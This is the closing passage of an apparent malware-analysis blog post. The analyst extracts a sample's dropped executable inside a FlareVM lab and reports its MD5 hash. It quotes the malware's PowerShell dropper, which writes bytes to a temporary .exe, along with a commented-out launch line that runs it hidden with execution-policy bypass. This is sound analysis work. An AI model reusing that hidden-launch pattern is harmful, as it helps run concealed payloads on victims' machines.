[System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
# the final line stays commented out so the extracted file is written but never run
#powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

Afterwards, I just got the hash from $tempExePath like before.

PS C:\Users\flarevm > Get-FileHash $tempExePath -Algorithm MD5

Algorithm       Hash                                      Path
---------       ----                                      ----
MD5             3C63488040BB51090F2287418B3D157D          C:\Users\flarevm\AppData\Local\Temp\1e856cd7-7097-4c1b-8650-aa79e07b3adb.exe
This is all for now! Happy Hunting
Bernardo :)
